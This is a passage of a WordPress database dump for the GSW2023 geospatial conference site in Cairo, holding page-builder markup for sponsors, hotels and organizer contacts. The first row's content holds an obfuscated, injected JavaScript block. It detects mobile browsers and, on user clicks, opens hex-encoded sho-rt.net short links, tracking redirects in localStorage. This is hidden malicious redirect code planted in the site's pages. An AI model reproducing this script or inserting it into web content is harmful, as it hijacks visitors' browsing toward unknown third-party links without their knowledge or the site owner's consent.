_0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-29 03:22:34','2023-07-29 03:22:34','',3066,'https://gsw2023.com/?p=5064',0,'revision','',0),
(5065,1,'2023-07-29 03:23:00','2023-07-29 03:23:00','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" 